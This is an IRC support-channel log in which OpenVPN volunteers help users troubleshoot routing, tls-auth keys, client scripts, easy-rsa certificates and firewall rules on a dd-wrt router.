14:56 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving]
14:58 -!- neilhwatson [~neil@cl-274.chi-03.us.sixxs.net] has joined #openvpn
15:02 < hg_5> hmm pekster it still doesn't work, i cant ping from router 192.168.7.x subnet , http://puu.sh/1Yufn
15:02 < hg_5> my router now has this in routing, but still doesnt work
15:06 <+pekster> That's one part of the process
15:07 <+pekster> Follow the flowchart for the !clientlan output as it will lead you to the exact component that's wrong
15:08 <+pekster> Obviously, your client needs to be connected too (the one that owns that network) and its firewall needs to permit the traffic
15:15 < hg_5> my client router has its local ip 192.168.7.7 , and i even can't ping it
15:18 <+pekster> That's not the first thing you're supposed to be doing according to the flowchart
15:18 <+pekster> I can't help if you can't follow directions
15:19 <+pekster> If you have that problem at the correct point on the flowchart, you will discover the fix to that problem
15:20 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Read error: Operation timed out]
15:22 -!- neilhwatson [~neil@cl-274.chi-03.us.sixxs.net] has quit [Quit: Leaving.]
15:40 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn
15:40 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host]
15:40 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
15:40 -!- mode/#openvpn [+o krzee] by ChanServ
15:40 <@krzee> https://community.openvpn.net/openvpn/wiki/IOSinline
15:40 <@vpnHelper> Title: IOSinline – OpenVPN Community (at community.openvpn.net)
15:41 <@krzee> !ios
15:41 <@krzee> !iphone
15:41 <@vpnHelper> "iphone" is (#1) http://www.zdnet.com/blog/hardware/ubuntu-lucid-lynx-1004-can-read-your-iphones-secrets/8424 <-- be aware of that before putting your keys on an iphone or (#2) OpenVPN is now available for iOS in the App Store
15:42 <@krzee> !learn iphone as https://community.openvpn.net/openvpn/wiki/IOSinline
15:42 <@vpnHelper> Joo got it.
15:42 <@krzee> !learn inline as https://community.openvpn.net/openvpn/wiki/IOSinline for a writeup that includes how to use inline certs
15:42 <@vpnHelper> Joo got it.
15:43 <+pekster> That article doesn't explain how if the encryption is "PIN-based" how one can mount up the volume without first decrypting it
15:45 <+pekster> Sounds like it's either not actually encrypted, or decrypted at runtime and exposed through a fairly easy-to-exploit overflow execution. Good thing the source was closed so no one could discover the attack vector ;)
15:46 <@krzee> #1 above?
15:47 <@krzee> no exploit involved
15:47 <+pekster> Yea, I'm reading the linked article with more details now
15:47 <@krzee> hopefully not the same in current ios, but i wouldnt know
15:47 <+pekster> It still doesn't bode well for the security model that it was compromised like that
15:48 <+pekster> If we haven't learned already from Java/Flash, another "OS update" doesn't protect you like a magic ward
15:48 <@krzee> even if updated, with it being closed source and this existed before, ild highly doubt they actually made it secure
15:50 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit []
15:52 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection]
15:54 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
15:57 <+pekster> krzee: Also concerning is that it took Apple 3 months from the time that article was published to the time they released an iOS fix for it
15:57 <+pekster> No clue if they had notice before that publish date too (making it >3mo)
15:58 <@krzee> and nobody was even testing to make that article, they just happened to notice
15:59 <@krzee> plugged their phone into ubuntu and went "hey look!"
15:59 <+pekster> Right :)
15:59 <+pekster> But if you're a Good Apple Employee what would you be doing with Ubuntu ;)
15:59 <@krzee> they have oldschool unix guys there
15:59 <@krzee> then again, they wouldnt be using ubuntu
16:00 <@krzee> lol
16:00 <@krzee> more like netbsd and friends
16:00 <@krzee> a friend of mine was one of their solaris admins
16:00 <+pekster> NetBSD isn't bad if you need a Unix :)
16:02 <+pekster> copyleft doesn't inherently make it more secure, just more likely that flaws are found when skilled people review it. Debian/SSL years back did highlight the importance of that 2nd part :)
16:03 < EugeneKay> Debian/SSL was a case of downstream "being smarter" than upstream
16:03 <+pekster> Right
16:13 -!- walp [~nobody@unaffiliated/walp] has joined #openvpn
16:14 < walp> quick question, if i already have a ssh port forward on a remote machine pointed to a proto tcp vpn endpoint (server), could i point the --remote in the client to a local ssh port forward (socks5) ?
16:14 <@krzee> yes, see socks options in the manual
16:14 <@krzee> !man
16:14 <@vpnHelper> "man" is (#1) For man pages, see http://openvpn.net/index.php/open-source/documentation/manuals/ or (#2) the man pages are your friend!
16:15 <@krzee> HOWEVER
16:15 <@krzee> this is a bad setup
16:15 <@krzee> !tcp
16:15 <@vpnHelper> "tcp" is (#1) Sometimes you cannot avoid tunneling over tcp, but if you can avoid it, DO. http://sites.inka.de/~bigred/devel/tcp-tcp.html Why TCP Over TCP Is A Bad Idea. or (#2) http://www.openvpn.net/papers/BLUG-talk/14.html for a presentation by James Yonan (OpenVPN lead developer) or (#3) if you must use tcp, you likely want --tcp-nodelay
16:15 <@krzee> you are basically ensuring a tcp-in-tcp setup, and if you're using tcp over the vpn it is tcp-in-tcp-in-tcp
16:15 <@krzee> just asking for meltdown
16:16 < walp> so, --socks-proxy 127.0.0.1:LOCAL_PORT
16:16 < walp> in client
16:16 -!- c3vin [~c3vin@70.62.198.163] has quit [Ping timeout: 240 seconds]
16:17 <@krzee> yep, but if it sucks you know why
16:17 < walp> ya
16:17 <@krzee> (it may start good and get progressively worse)
16:17 <@krzee> also, you could use a real socks server, that uses udp
16:17 <@krzee> like dante
16:17 < walp> could i not do udp-in-tcp-in-tcp
16:18 <@krzee> sure, but its still tcp in tcp
16:18 < walp> say proto udp in the client and server, tunneled over tcp socks5
16:18 <@krzee> no
16:18 <@krzee> but you can xfer udp over your tcp vpn which is over a tcp socks
16:18 <@krzee> but your tcp ssh socks can only connect to tcp
16:19 < walp> gotcha
16:19 <@krzee> a dante socks server can run on udp, and connect to udp
16:19 <@krzee> which would allow the vpn to be udp
16:19 -!- nickanderson is now known as nickanderson_afk
16:19 <+pekster> Why mess with proxies anyway?
16:19 <@krzee> oh wait no
16:19 <@krzee> dante would be on tcp
16:19 <@krzee> but then vpn could be on udp
16:19 <+pekster> If you can ssh in, you presumably have control over the system, the firewall, and the OS
16:19 <@krzee> ^^^
16:19 <@krzee> best to lose the proxy if you can
16:20 < walp> as of right now, i have ovpn configured to run on 53/udp
16:20 < walp> because most networks will allow outgoing 53/udp requests, whether or not it's DNS traffic
16:20 < kisom> Not really
16:21 < kisom> Most restricted networks have a local DNS server
16:21 <+pekster> Some might, but many just redirect all outbound DNS requests to their internal server if they're security conscious
16:21 <+pekster> More strict places do DPI anyway
16:21 < walp> yeah
16:21 <+pekster> Nothing saves you from a (good) DPI box
16:21 <+pekster> Cell service maybe ;)
16:21 < kisom> pekster: Cell service saved you from nothing ;)
16:22 < walp> vpn over tor/proxychains over 4g lol
16:22 <@krzee> ild expect responsible admins to rate limit their 53 outbound if nothing else
16:23 < walp> i want to do a similar setup in a little while, the goal of which is to only allow vpn traffic to a git repository
16:23 < kisom> walp: port 80 and 443 is probably your best bet
16:23 < walp> yeah probably 443 would be better
16:23 < kisom> And yes, while a DPI can indeed block OpenVPN on those ports, they are just as likely to do so on 53/UDP
16:24 < walp> or 43/tcp :)
16:24 < kisom> I use TCP/3724 in china. The port used by world of warcraft.
16:24 < walp> ^ lol
16:24 <@krzee> lol nice
16:25 <@krzee> !inline
16:25 <@vpnHelper> "inline" is https://community.openvpn.net/openvpn/wiki/IOSinline for a writeup that includes how to use inline certs
16:26 <@krzee> !forget inline
16:26 <@vpnHelper> Joo got it.
16:26 <@krzee> !learn inline as Inline files supported since OpenVPN 2.1rc1 (pkcs12 since 2.2) and documented in the OpenVPN 2.3 man page (https://community.openvpn.net/openvpn/wiki/Openvpn23ManPage under INLINE FILE SUPPORT)
16:26 <@vpnHelper> Joo got it.
16:26 <@krzee> !learn inline as https://community.openvpn.net/openvpn/wiki/IOSinline for a writeup that includes how to use inline certs
16:26 <@vpnHelper> Joo got it.
16:26 < walp> lol
16:26 < walp> nice bot
16:26 <@krzee> thanks
16:26 <@krzee> !factoids
16:27 <@vpnHelper> "factoids" is A semi-regularly updated dump of factoids database is available at http://www.secure-computing.net/factoids.php
16:27 <@krzee> thats all he knows ^
16:27 < walp> does tls-auth work only with UDP?
16:27 <@krzee> yes
16:27 <@plaisthos> krzee: you had to copy&paste my grammar error of a missing "are" :p
16:27 <@krzee> to my understanding at least
16:27 <@krzee> feel free to try it
16:27 <+pekster> huh? No, that works anywhere
16:27 <+pekster> It's HMAC on top of the TLS stream
16:27 <@krzee> plaisthos, works to me when i say it!
16:28 <@plaisthos> Yeah but Inline files /are/ supported since .... sounds better
16:28 <@krzee> hmm i seem to remember it being udp only, but i dont use tcp anywhere, nor have i ever
16:28 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep]
16:28 <@plaisthos> tls-auth works with tcp
16:28 <@krzee> plaisthos, feel free to edit if you like
16:29 <@plaisthos> krzee: !forget and !learn again?
16:29 <@krzee> yep, forget *
16:29 <@plaisthos> !forget inline *
16:29 <@vpnHelper> Joo got it.
16:29 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 256 seconds]
16:29 <+pekster> krzee: is bot access based on cloak, or manually edited? I had a few entries I couldn't fix up with outdated info
16:30 <@krzee> your cloak should give you access
16:30 <@plaisthos> !learn inline as Inline files (e.g. ... are supported since OpenVPN 2.1rc1 and documented in the OpenVPN 2.3 man page (https://community.openvpn.net/openvpn/wiki/Openvpn23ManPage under INLINE FILE SUPPORT)
16:30 <@vpnHelper> Joo got it.
16:30 < walp> ok so, openvpn --genkey --secret ta.key on both client and server, and --tls-server --tls-auth ta.key 0 for server, and --tls-client --tls-auth ta.key 1 for client?
16:30 <@krzee> so both =]
16:30 <@plaisthos> !learn inline as https://community.openvpn.net/openvpn/wiki/IOSinline for a writeup that includes how to use inline certs
16:30 <@vpnHelper> Joo got it.
16:30 <@krzee> (your new cloak)
16:30 <@plaisthos> !inline
16:30 <@vpnHelper> "inline" is (#1) Inline files (e.g. ... are supported since OpenVPN 2.1rc1 and documented in the OpenVPN 2.3 man page (https://community.openvpn.net/openvpn/wiki/Openvpn23ManPage under INLINE FILE SUPPORT) or (#2) https://community.openvpn.net/openvpn/wiki/IOSinline for a writeup that includes how to use inline certs
16:31 <+pekster> walp: Almost. You need the *same* key on both sides
16:31 < walp> err ya
16:31 <+pekster> So, you can't generate it on both ends since it's random
16:31 < walp> so gen on server
16:31 < walp> then scp to workstation
16:31 <+pekster> Yup. Every client needs the same key, used in the opposite direction (0 vs 1) from the server
16:31 <@krzee> gen wherever, make sure its the same on EVERY endpoint
16:32 < walp> coolies
16:32 <+pekster> It basically just prevents any peer without that key from even attempting an authentication (which eats up resources, even if they don't have a valid client cert or pass)
16:32 <@krzee> layer7 attack prevention
16:33 < walp> kinda like preventing a connection to IRC with SSL by only allowing certain SSL fingerprints
16:33 <@krzee> stops a slowloris from being made against openvpn
16:33 < EugeneKay> Before SSL even occurs
16:34 < walp> so before it blesses the existing socket with ssl, but after it's in an ESTABLISHED state
16:34 < EugeneKay> Yes, though UDP really doesn't establish
16:34 < walp> with proto tcp anyway
16:35 <@krzee> (hes using tcp)
16:35 < walp> but yeah UDP just before the lbess
16:35 < walp> *bless
16:39 < walp> ok now, is there a way to run a shell script that emails me whenever someone logs on to the vpn?
16:40 < kisom> Yes.
16:40 <@krzee> !script
16:40 <@vpnHelper> "script" is see http://openvpn.net/index.php/open-source/documentation/manuals/69-openvpn-21.html#lbAR for a list of places scripts can hook into openvpn
16:40 <@krzee> maybe youd like --client-connect
16:40 < walp> dood that's badass
16:40 < Devastator> is it correct to say that easy-rsa dir is a PKI?
16:40 < walp> openvpn is the shit
16:40 <@krzee> i agree, that scripting interface is GREAT
16:40 -!- vmachine2 [~PC@78-105-138-183.zone3.bethere.co.uk] has joined #openvpn
16:41 <@krzee> Devastator, basically. the pki is the crypto files in there
16:41 < kisom> I don't like the idea with dynamic configuration files
16:41 <@krzee> backing up the easy-rsa dir is backing up the pki
16:41 -!- vmachine2 [~PC@78-105-138-183.zone3.bethere.co.uk] has left #openvpn []
16:41 < walp> are there scripting examples based on those hooks?
16:41 <@krzee> kisom, why not?
16:41 < kisom> I think openvpn should just read the script's STDOUT and assume it is the config
16:41 < kisom> Because writing temporary files feels like a quickhack
16:41 <@krzee> kisom, it reads from the file you output to $1 iirc
16:42 < kisom> Yeah
16:42 <+pekster> walp: I've got a GPL foundation you can start with if you want some accounting stuff. It doesn't email you, but it should be trivial to send it somewhere other than a flat-file:
16:42 <+pekster> !accounting
16:42 <@vpnHelper> "accounting" is http://pekster.sdf.org/code/files/openvpn-user-accounting.tgz for some bash code for basic accounting
16:42 < kisom> That's not a good thing imo
16:42 <@krzee> pekster, nice!
16:43 < walp> ohhh it does an export ?
16:43 <@krzee> export?
16:43 <+pekster> It's just a bash script to collect some env-vars that define the user on disconnect and write stats
16:43 < walp> like, i could read it from $ENV{'trusted_ip'} with a perl script
16:44 <+pekster> Right
16:44 <@krzee> yep
16:44 <+pekster> That's basically what that script does, although that's on disconnect to collect stats about the session (connect/disconnect time, bw transferred, IP used, etc)
16:44 < walp> pekster: are you single? :D
16:44 <@krzee> and the !script link in manual gives a bunch of inherited ENV vars
16:44 <@krzee> or you can dump the ENV
16:45 <@krzee> (from within the script)
16:48 < Devastator> krzee great, I was just wondering that, because of the talk we had yesterday about securing the vpn... so if I put easy-rsa into a usb stick and use it to build-ca, build-key-server, I can use it to sign csr and/or generate client keys from within a live cd, correct?
16:48 < kisom> Devastator: That's correct.
16:49 < Devastator> ok, I understand the concept, time for more trials heheh
16:49 <+pekster> With an offline CA like that, normally you don't want to run the 'build-key-server' scripts, but generate the keypair (produces a private key and a CSR) and send the CSR to the offline signing host
16:49 < Devastator> I mean, I think I understand the concept, that is
16:49 <+pekster> IIRC, build-key-server is designed to both generate the request and sign it all at once
16:49 < walp> so the 'untrusted_ip' would still be available in --client-connect
16:50 <+pekster> walp: $trusted_ip should too
16:50 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer]
16:50 < walp> ah
16:51 <+pekster> Although they should both be the same :P
16:51 < Devastator> pekster pardon for the question, but how to generate a private key and a CSR? I'm getting used to the scripts
16:52 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit []
16:52 < kisom> Devastator: Just use the scripts, it does not matter in this case since you're your own CA.
16:52 < kisom> Devastator: The point with CSR is that you send your public key to someone else and they sign it, without knowing your private key.
16:53 < Devastator> kisom something like.. ./build-key server?
16:53 < walp> i'm guessing that any other exit code than 0 throws an error?
16:54 < kisom> Devastator: Yes
16:54 < kisom> walp: Any other exit code will deny access to the connecting client.
16:55 < walp> k
16:55 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn
16:55 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host]
16:55 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
16:56 -!- mode/#openvpn [+o krzee] by ChanServ
17:01 < Devastator> hum.. things are getting clear.. vars script is to prepare the environment to generate cert/keys from what I understand..
17:03 <@krzee> yep
17:03 <@krzee> thats why you source it
17:03 <@krzee> it loads the vars into memory for the next step(s)
17:03 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit []
17:05 -!- AsadH is now known as zz_AsadH
17:08 < Devastator> I will pastebin my steps in a few, to see if I understand everything I need to, and I didn't get to configuring routings etc for my needs yet heheh
17:08 <@krzee> you shouldnt get to routing yet
17:08 <@krzee> first get a vpn up
17:08 <@krzee> THEN build on that vpn
17:09 < Devastator> exactly, I plan to understand how to handle certs/keys first, then move to configuring it per se...
17:11 <+pekster> Well, you can always split your PKI out to an offline system later. easy-rsa used all on 1 host is easy. It may not be for the security-paranoid (raises hand) but it's quick and functional. Keys are still encrypted on-disk. The only real difference is that it's an online CA, and keys are stored in 1 place.
17:12 <+pekster> Paranoid is free. The vault and guards will, however, cost you.
17:12 <+pekster> Paranoia*
17:20 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 256 seconds]
17:25 < Devastator> pekster and a shotgun :)
17:26 <+pekster> !shotgun
17:26 <@vpnHelper> "shotgun" is (#1) the most effective form of physical security or (#2) shotgun security? If you try to physically attack my network, I chase you with a shotgun.
17:26 < Devastator> hahahahaha
17:26 < Devastator> I can't stop laughing
17:26 -!- b1rkh0ff [~b1rkh0ff@178.77.4.218] has quit [Ping timeout: 244 seconds]
17:29 -!- daemonoob [~rschultz@68-233-212-42.static-ip.telepacific.net] has quit [Quit: Leaving]
17:31 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 244 seconds]
17:34 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 264 seconds]
17:34 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn
17:35 < walp> hmm that's weird
17:35 < walp> so i had proto tcp port 443
17:35 < walp> windows openvpn client wouldn't connect
17:35 < walp> changed it to 443/udp and it instantly connected
17:38 -!- b1rkh0ff [~b1rkh0ff@178.77.2.66] has joined #openvpn
17:47 <+pekster> connecting as a windows client to tcp/443 works fine. Could be firewalls or a proxy that didn't like it though
17:50 < walp> ok so i have connected with windows openvpn with tls-auth etc
17:50 < walp> i get an ip
17:50 < walp> but i can't ping the other endpoint
17:51 < walp> http://pastie.org/pastes/6083482/text?key=f8g2qdnnfhps2r89pgqsea
17:53 < walp> http://pastie.org/pastes/6083496/text?key=fasfjxaz39bvzyshrnzp7q client
17:54 <+pekster> It usually boils down to a firewall problem. Also, your setup will cause you problems unless you use 'persist-key' (unless the key is actually readable by your www-data user. That would likely be a security risk if you run other things as that user too)
17:54 < walp> no firewall on either device
17:54 <+pekster> See the '--user' description in the manpage for more details on potential issues when dropping user privs like that
17:54 < walp> yet
17:55 <+pekster> And you can't ping 10.20.0.1 from the client?
17:55 < walp> correct
17:56 <+pekster> client getting the interface set correctly? Logs at 'verb 4' would be helpful starting with the client, and I may need the server logs too
17:56 <+pekster> (I assume you've verified firewall status with 'iptables-save' on the server already? If not, drop that somewhere too)
17:57 < walp> iptables is clear
17:57 < walp> http://pastie.org/pastes/6083519/text?key=ws3xr7f9cidiska1asm7g client log
17:58 <+pekster> You have an error there. That's also not verb 4
17:59 <+pekster> The route failed to be added. Are you running as an admin?
17:59 < walp> i thought that the win32-tap service would be, and that you didn't have to run the openvpn gui client as admin
17:59 <+pekster> Oh, and it failed to handle the topology. You're using a 2.0.9 client?
17:59 <+pekster> That's really, REALLY old
17:59 <+pekster> !download
17:59 <@vpnHelper> "download" is (#1) http://openvpn.net/index.php/download/community-downloads.html to download openvpn or (#2) OpenVPN's Windows installer now includes OpenVPN GUI. Don't bother with http://openvpn.se anymore or (#3) Don't trust download.com at all. It provides an extremely old version with malware: http://insecure.org/news/download-com-fiasco.html or (#4) in the community version of openvpn (only
17:59 <@vpnHelper> thing supported here) there is no separate download for client/server, it is the same install with different configs
17:59 <+pekster> Like, years old
17:59 < walp> *sigh*
17:59 <+pekster> Update your client. We're at 2.3.0
18:00 < walp> lol
18:00 -!- p0rk [~d0dger@pa-67-235-87-119.dhcp.embarqhsd.net] has joined #openvpn
18:00 < p0rk> fys, you here?
18:00 < walp> so the config is good
18:00 < walp> but my client is not
18:01 < p0rk> or anyone else who helped me (WDKevin) earlier today with my bridge issue
18:04 < walp> hmm okay
18:04 < walp> my client is updated
18:04 < walp> still getting same error
18:04 <+pekster> Logs with verb 4 this time
18:04 -!- p0rk [~d0dger@pa-67-235-87-119.dhcp.embarqhsd.net] has quit [Read error: Connection reset by peer]
18:04 <+pekster> All of it
18:04 < walp> aha
18:05 < walp> just had to run it as administrator
18:05 < walp> i can now ping 10.20.0.1
18:05 < walp> i guess it just didn't have permission to add the route to the virtual adapter?
18:05 <+pekster> Non-admins can't add routes on most OSes
18:05 <+pekster> (with some really technical exceptions that don't apply to you)
18:06 < walp> so, client-to-client in the server config will enable me to setup linux "client" (even though it's a server)
18:07 < walp> so that i can setup apache for instance, listening on the tunnel IP on the "client" linux server
18:07 <+pekster> No
18:07 -!- p0rk [~d0dger@pa-67-235-87-119.dhcp.embarqhsd.net] has joined #openvpn
18:07 <+pekster> !c2c
18:07 <@vpnHelper> "c2c" is "client-to-client" is with this option packets from 1 client to another are routed inside the server process. without it packets leave the server process, hit the kernel (firewall, routing table) and if allowed by firewall and routed back to server process, they go to the client. you use this option when you do not want to use selective firewall rules on what clients can access things
18:07 <@vpnHelper> behind other clients
18:08 < p0rk> pekster, it was you!
18:08 <+pekster> Generally, you never need c2c unless you're trying to avoid firewalling traffic between clients (a possible advantage if you don't want a stateful firewall keeping state on those connections)
18:08 < walp> well, okay maybe you can clarify.. what i want to do is setup apache to listen on 10.20.0.10 (for example) that only VPN clients can access
18:08 < p0rk> you were helping me with removing br0 and i tried it from work but it broke
18:08 < p0rk> im home now and finished removing it, im back to just eth0 on the correct ip, but i still cant connect
18:09 <+pekster> walp: Your best bet is to bind apache to the wildcard interface (ie: 0.0.0.0:80 and 443 if you need) and firewall it. Most apps get angry if you rip out their socket from under them
18:10 <+pekster> Optionally you can bind to the VPN IP, but you need to code magic to get apache httpd to run when the VPN connects, and somehow gracefully handle tear-down. And your IP changes each time unless you do static addressing. It's non-trivial to do that
18:10 < walp> pekster: with client-config-dir ?
18:10 <+pekster> So you don't "really" want apache to listen on the VPN IP
18:10 < walp> and using static addressing per CN
18:10 <+pekster> Sure, a ccd file could get a static IP
18:11 <+pekster> You still are left with a mess to deal with binding httpd to an interface that goes down if you lose connectivity
18:11 < walp> that's fine
18:11 <+pekster> (or the VPN just needs a restart for whatever reason)
18:11 <+pekster> as in, it might actually crash httpd
18:11 <+pekster> YMMV
18:11 <+pekster> p0rk: All IP removed on br0? That bridge is gone, and you have the IP on eth0 only now?
18:11 < walp> that's fine too, i can just cron an external verification that apache is up with it listening on eth0
18:12 < p0rk> pekster, correct
18:12 < walp> if not, killall -9 openvpn httpd; sleep 3; /etc/init.d/openvpn start; sleep 5; /etc/init.d/httpd start
18:12 <+pekster> walp: Not really. It could be up on eth0 but not the VPN IP if you have different Listen directives
18:12 -!- p0rk [~d0dger@pa-67-235-87-119.dhcp.embarqhsd.net] has quit [Read error: Connection reset by peer]
18:13 <+pekster> So basically, don't bind to specific IPs like that unless you fully understand what you're doing
18:13 < walp> pekster: yeah everything about that apache is going to be manual config
18:13 -!- p0rk [~d0dger@pa-67-235-87-119.dhcp.embarqhsd.net] has joined #openvpn
18:13 <+pekster> Use a firewall for controlling access, like you should
18:13 < walp> if apache at all, might do nginx
18:13 < walp> i hate binding to wildcard
18:13 <+pekster> Okay...
18:14 * pekster shrugs. No idea how you want to handle restarting the vhost or HUPing the service when the VPN comes up, but you can script all that magic in an --up or --route-up script I suppose
18:14 <+pekster> It's a bad solution IMO, but it's there for you to play with
18:14 < walp> just call /usr/local/sbin/nginx -s reload on --up
18:14 < walp> i guess
18:15 < walp> ill figure out a way
18:16 <+pekster> p0rk: netstat -nlp | grep openvpn shows it on the port you expect?
18:16 -!- WDKevin [~WDKevin@173-163-136-177-centralpennsylvania.hfc.comcastbusiness.net] has quit [Ping timeout: 272 seconds]
18:22 < p0rk> im sorry, i had to get the stove fired up
18:23 < p0rk> it shows port 1194
18:23 < p0rk> which is correct
18:23 < p0rk> however
18:23 < p0rk> when i nmap my domain, i do not see that port
18:26 <+pekster> You may not see replies for UDP ports, depending on how everything is configured
18:26 <+pekster> UDP or TCP?
18:26 < p0rk> ah
18:26 < p0rk> in my router i have both set
18:26 <+pekster> No, what is ovpn running as?
18:26 < p0rk> i have dd-wrt, has a drop down for udp, tcp and both
18:26 < p0rk> oh
18:26 <+pekster> The router only needs the one you're actually using
18:26 < p0rk> udp
18:26 <+pekster> Okay. 'tcpdump -pnvi eth0 udp port 1194' on the server
18:27 < p0rk> port 1194, proto udp, dev tun0
18:27 < p0rk> ok
18:27 <+pekster> That'll watch for traffic on udp port 1194 across eth0 (change that to your LAN iface name if it's different)
18:27 < p0rk> then try to connect?
18:27 <+pekster> connect again from your client
18:27 <+pekster> Yes
18:27 < p0rk> ok
18:27 < p0rk> nadda
18:27 <+pekster> If tcpdump shows nothing, you have a firewall or routing problem (probably on your router, or upstream from that, such as your ISP)
18:27 < p0rk> the error i get is always "No connection could be made because the target machine actively refused it.."
18:28 < p0rk> i had openvpn working previously, i just got rid of the server and virtualized it
18:28 <+pekster> 'iptables-save' on the server was blank before, right? Full open with no rules and a policy of ACCEPT on INPUT?
18:28 < p0rk> i am authenticating differently, but apparently its not reaching that point anyway
18:28 < p0rk> that is correct
18:28 < p0rk> should i run it on the router?
18:28 <+pekster> No need if you can properly port forward stuff
18:28 <+pekster> Or you mean tcpdump?
18:29 < p0rk> no, i meant iptables-save
18:29 <+pekster> Sure, post that if you can get a shell and have iptables-save
18:29 < p0rk> dur
18:29 < p0rk> it doesnt have iptables-save
18:29 <+pekster> I can use iptables output too, but iptables-save is highly preferred
18:29 <+pekster> Lovely
18:29 <+pekster> Go smack the dd-wrt folks for me
18:29 < p0rk> id love to
18:29 < p0rk> i can do iptables -nL but i know you dont like that
18:29 < p0rk> although it's pretty lengthy
18:29 <+pekster> Better way to do that:
18:30 <+pekster> for table in nat mangle filter; do echo "* TABLE: $table"; iptables -t $table -nvL; done
18:30 < p0rk> just c/p that entire line?
18:30 <+pekster> Sure
18:30 < p0rk> it scrolled pages of crap
18:30 < p0rk> lol
18:31 <+pekster> It's similar to (but not nearly as easy to read as) iptables-save
18:31 < walp> ok, and duplicate-cn
18:31 <+pekster> It's just stupid to include iptables but not iptables-save on hosts
18:31 < p0rk> yea
18:31 < walp> i would put that in server.conf in order to have multiple machines with the same cert be able to connect
18:31 < walp> e.g. desktop and laptop
18:31 <+pekster> walp: Yup
18:31 < walp> cool
18:31 <+pekster> Ideally you use different certs for that
18:32 <+pekster> But duplicate-cn is there if you can't/won't do that
18:32 <+pekster> No real reason besides a compromise of one cert inherently breaks the other. (Oh, and ccd entries are based on CN, so you can't do static addressing without unique CNs)
18:32 < p0rk> pekster, i do see the entry for 1194 on my router in the output of your command
18:32 < walp> gotcha
18:32 < p0rk> under chain forward
18:32 < p0rk> 0 0 logaccept tcp -- * * 0.0.0.0/0 192.168.1.101 tcp dpt:1194
18:32 < p0rk> 0 0 logaccept udp -- * * 0.0.0.0/0 192.168.1.101 udp dpt:1194
18:32 <+pekster> Post the whole thing as it could still be a firewall issue
18:33 < p0rk> ok
18:33 < p0rk> i dont have a firewall though
18:33 <+pekster> I have no idea what the 'logaccept' chain is doing, where it's called from, or how that relates to your NAT
18:33 <+pekster> netfilter *is* the firewall
18:33 < p0rk> gotcha
18:33 < p0rk> let me pastie it all
18:33 <+pekster> You can't have NAT without a firewall
18:33 <+pekster> It may be very permissive, but it is still a firewall
18:33 < walp> iptables -vnL
18:33 < p0rk> i worded it wrong
18:33 < walp> paste that to pastebin :)
18:33 <+pekster> walp: I already got it covered with all 3 standard chains
18:34 <+pekster> It's critical to get nat too, which is why iptables -L sucks. dd-wrt sucks too for not including iptables-save, but I'll try to contain myself...
18:34 < p0rk> http://pastie.org/private/s3xamqar5gwbtnhp7oty8g
18:35 <+pekster> That's just filter
18:35 <+pekster> I need nat too
18:35 < p0rk> doh
18:35 < walp> -t nat
18:35 <+pekster> Might as well post mangle too, just in case the distro does silly things there
18:35 < p0rk> so what command do you want to see the entire output of?
18:35 < p0rk> that for loop?
18:35 <+pekster> walp: Check my bash loop above for a "poor man's iptables-save" version
18:35 < walp> ah ya
18:36 <+pekster> yes
18:36 < walp> for t in {nat,mangle,filter}; do iptables -vnL INPUT -t $t; done
18:36 < p0rk> i gotta figure out how to increase the buffer
18:36 < p0rk> it spits out too much
18:36 <+pekster> Dump it to a file and scp it over
18:36 < walp> or install wgetpaste and pipe it
18:36 -!- nickanderson_afk is now known as nickanderson
18:37 < p0rk> im stupid. how do i dump it to a file?
18:37 < walp> command > file.txt
18:37 < p0rk> but in that for loop, where do i do it?
18:37 < walp> at the end
18:37 <+pekster> Well, the loop can be changed like this, assuming you want it to /tmp/output.txt
18:37 < p0rk> for table in nat mangle filter; do echo "* TABLE: $table"; iptables -t $table -nvL > output.txt; done
18:37 < p0rk> ?
18:37 <+pekster> nope, not for the bash
18:37 < walp> no, after done
18:37 <+pekster> for table in nat mangle filter;iptables -t $table -nvL >> /tmp/output.txt; done
18:37 <+pekster> walp: Not helpful
18:38 -!- eN_Joy [~eN_Joy@jindan.chem.ou.edu] has quit [Ping timeout: 264 seconds]
18:38 < p0rk> you 2 are contradicting yourselves so much
18:38 < p0rk> lol
18:38 <+pekster> p0rk: Follow my instructions, since they'll actually work
18:38 < p0rk> i am
18:38 < p0rk> but yours throws an error about word unexpected
18:38 < p0rk> expecting do
18:38 <+pekster> Oh, ugh, editing crap in irssi not convenient
18:38 <+pekster> for table in nat mangle filter;do iptables -t $table -nvL >> /tmp/output.txt; done
18:38 < walp> pekster: story of my life lol
18:39 < p0rk> ok
18:39 <+pekster> Then scp over /tmp/output.txt and drop that somewhere
18:39 < p0rk> how do i use scp? :-X
18:39 < walp> oboy
18:39 < p0rk> yea
18:39 < p0rk> im embarrassed
18:39 <+pekster> scp root@router_ip:/tmp/output.txt ./
18:39 <+pekster> Assuming the root user and a default ssh port
18:40 < p0rk> port 2222
18:40 <+pekster> scp -P 2222 root@router_ip:/tmp/output.txt ./
18:40 < p0rk> oh i run that from a server other than the router?
18:40 <+pekster> Anything that has 'scp' available. putty's pscp.exe works too
18:40 < walp> yeah, you're pulling that from your machine
18:41 < walp> if you're root on the machine with the firewall, you could also email it to yourself
18:41 <+pekster> Optionally, just upload 'iptables -t nat -nvL' somewhere, since I already have filter
18:41 < p0rk> ok, i got it
